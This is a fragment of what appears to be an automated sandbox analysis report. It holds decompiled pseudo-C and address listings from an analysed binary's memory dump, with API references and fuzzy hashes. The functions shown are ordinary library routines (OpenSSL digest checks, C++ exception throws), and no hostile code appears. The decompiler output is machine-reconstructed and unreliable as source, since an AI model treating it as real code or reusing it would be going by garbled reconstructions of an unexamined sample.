                                                                                                    					}
                                                                                                    				}
                                                                                                    			}











                                                                                                    0x00413c40
                                                                                                    0x00413c44
                                                                                                    0x00413c46
                                                                                                    0x00413c47
                                                                                                    0x00413c4a
                                                                                                    0x00413c50
                                                                                                    0x00413c57
                                                                                                    0x00413c60
                                                                                                    0x00413c8e
                                                                                                    0x00413c93
                                                                                                    0x00413c62
                                                                                                    0x00413c62
                                                                                                    0x00413c65
                                                                                                    0x00413c96
                                                                                                    0x00413c9b
                                                                                                    0x00000000
                                                                                                    0x00413c67
                                                                                                    0x00413c68
                                                                                                    0x00413c6d
                                                                                                    0x00413c72
                                                                                                    0x00413ca0
                                                                                                    0x00413ca0
                                                                                                    0x00413ca5
                                                                                                    0x00413ca6
                                                                                                    0x00413ca7
                                                                                                    0x00413ca8
                                                                                                    0x00413ca9
                                                                                                    0x00413caa
                                                                                                    0x00413cab
                                                                                                    0x00413cac
                                                                                                    0x00413cad
                                                                                                    0x00413cae
                                                                                                    0x00413caf
                                                                                                    0x00413cb0
                                                                                                    0x00413cb1
                                                                                                    0x00413cb3
                                                                                                    0x00413cb5
                                                                                                    0x00413cb7
                                                                                                    0x00413cba
                                                                                                    0x00413cc2
                                                                                                    0x00413cc8
                                                                                                    0x00413ccf
                                                                                                    0x00413ccf
                                                                                                    0x00413cd7
                                                                                                    0x00413c74
                                                                                                    0x00413c78
                                                                                                    0x00413c7d
                                                                                                    0x00413c80
                                                                                                    0x00413c83
                                                                                                    0x00413c8b
                                                                                                    0x00000000
                                                                                                    0x00413c8b
                                                                                                    0x00413c72
                                                                                                    0x00413c65

                                                                                                    APIs
                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                    • _memset.LIBCMT ref: 00413C83
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                    • String ID: vector<T> too long
                                                                                                    • API String ID: 1327501947-3788999226
                                                                                                    • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                                    • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                    • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                                    • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 75%
                                                                                                    			E00480620(void* __ebx, void* __edx, void* __ebp, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				intOrPtr _t10;
                                                                                                    				void* _t13;
                                                                                                    				intOrPtr* _t15;
                                                                                                    				intOrPtr* _t26;
                                                                                                    				void* _t27;
                                                                                                    				void* _t28;
                                                                                                    				intOrPtr* _t29;
                                                                                                    				void* _t31;
                                                                                                    				void* _t32;
                                                                                                    
                                                                                                    				_t29 = _a4;
                                                                                                    				_t10 =  *_t29;
                                                                                                    				_t34 =  *((intOrPtr*)(_t10 + 8)) - 0x40;
                                                                                                    				if( *((intOrPtr*)(_t10 + 8)) > 0x40) {
                                                                                                    					E00454C00(__ebx, __edx, _t27, _t29, __ebp, _t34, ".\\crypto\\evp\\digest.c", 0x10f, "ctx->digest->md_size <= EVP_MAX_MD_SIZE");
                                                                                                    					_t31 = _t31 + 0xc;
                                                                                                    				}
                                                                                                    				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x18))))(_t29, _a8);
                                                                                                    				_t26 = _a12;
                                                                                                    				_t32 = _t31 + 8;
                                                                                                    				_t28 = _t13;
                                                                                                    				if(_t26 != 0) {
                                                                                                    					 *_t26 =  *((intOrPtr*)( *_t29 + 8));
                                                                                                    				}
                                                                                                    				_t15 =  *((intOrPtr*)( *_t29 + 0x20));
                                                                                                    				if(_t15 != 0) {
                                                                                                    					 *_t15(_t29);
                                                                                                    					E0047D100(_t29, 2);
                                                                                                    					_t32 = _t32 + 0xc;
                                                                                                    				}
                                                                                                    				E0042B420( *((intOrPtr*)(_t29 + 0xc)), 0,  *((intOrPtr*)( *_t29 + 0x44)));
                                                                                                    				return _t28;
                                                                                                    			}














                                                                                                    0x00480621
                                                                                                    0x00480626
                                                                                                    0x00480628
                                                                                                    0x0048062c
                                                                                                    0x0048063d
                                                                                                    0x00480642
                                                                                                    0x00480642
                                                                                                    0x0048064f
                                                                                                    0x00480651
                                                                                                    0x00480655
                                                                                                    0x00480658
                                                                                                    0x0048065c
                                                                                                    0x00480663
                                                                                                    0x00480663
                                                                                                    0x00480667
                                                                                                    0x0048066c
                                                                                                    0x0048066f
                                                                                                    0x00480674
                                                                                                    0x00480679
                                                                                                    0x00480679
                                                                                                    0x00480686
                                                                                                    0x00480692

                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 00480686
                                                                                                      • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                    Strings
                                                                                                    • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                    • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset_raise
                                                                                                    • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                    • API String ID: 1484197835-3867593797
                                                                                                    • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                    • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                    • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                    • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
                                                                                                    • __invoke_watson.LIBCMT ref: 004242CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DecodePointer__invoke_watson
                                                                                                    • String ID: i;B
                                                                                                    • API String ID: 4034010525-472376889
                                                                                                    • Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                                    • Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
                                                                                                    • Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                                    • Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 58%
                                                                                                    			E0044F23E(void* __eflags, char _a4) {
                                                                                                    				char _v12;
                                                                                                    				char _v16;
                                                                                                    				char _v32;
                                                                                                    				char _v40;
                                                                                                    				char _v60;
                                                                                                    				intOrPtr _v68;
                                                                                                    				char _v92;
                                                                                                    				char _v100;
                                                                                                    				char _v120;
                                                                                                    				void* _t58;
                                                                                                    				void* _t63;
                                                                                                    				void* _t64;
                                                                                                    				void* _t65;
                                                                                                    
                                                                                                    				_t58 = _t63;
                                                                                                    				_t64 = _t63 - 0xc;
                                                                                                    				E00430CFC( &_v16,  &_a4);
                                                                                                    				_v16 = 0x4d6554;
                                                                                                    				E00430ECA( &_v16, 0x5081fc);
                                                                                                    				asm("int3");
                                                                                                    				_push(_t58);
                                                                                                    				_t65 = _t64 - 0xc;
                                                                                                    				E00430CFC( &_v32,  &_v12);
                                                                                                    				_v32 = 0x4d6560;
                                                                                                    				E00430ECA( &_v32, 0x508238);
                                                                                                    				asm("int3");
                                                                                                    				_push(_t64);
                                                                                                    				E00430CFC( &_v60,  &_v40);
                                                                                                    				_v60 = 0x4d6578;
                                                                                                    				E00430ECA( &_v60, 0x508274);
                                                                                                    				asm("int3");
                                                                                                    				_push(_t65);
                                                                                                    				E0044EF74( &_v92, _v68);
                                                                                                    				E00430ECA( &_v92, 0x508320);
                                                                                                    				asm("int3");
                                                                                                    				_push(_t65 - 0xc);
                                                                                                    				E00430CFC( &_v120,  &_v100);
                                                                                                    				_v120 = 0x4d656c;
                                                                                                    				E00430ECA( &_v120, 0x5082cc);
                                                                                                    				asm("int3");
                                                                                                    				return "bad function call";
                                                                                                    			}
















                                                                                                    0x0044f23f
                                                                                                    0x0044f241
                                                                                                    0x0044f251
                                                                                                    0x0044f25e
                                                                                                    0x0044f266
                                                                                                    0x0044f26b
                                                                                                    0x0044f26c
                                                                                                    0x0044f26f
                                                                                                    0x0044f27f
                                                                                                    0x0044f28c
                                                                                                    0x0044f294
                                                                                                    0x0044f299
                                                                                                    0x0044f29a
                                                                                                    0x0044f2ad
                                                                                                    0x0044f2ba
                                                                                                    0x0044f2c2
                                                                                                    0x0044f2c7
                                                                                                    0x0044f2c8
                                                                                                    0x0044f2d4
                                                                                                    0x0044f2e2
                                                                                                    0x0044f2e7
                                                                                                    0x0044f2e8
                                                                                                    0x0044f2fb
                                                                                                    0x0044f308
                                                                                                    0x0044f310
                                                                                                    0x0044f315
                                                                                                    0x0044f31b

                                                                                                    APIs
                                                                                                    • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                      • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                    • String ID: TeM
                                                                                                    • API String ID: 757275642-2215902641
                                                                                                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                    • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                    • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%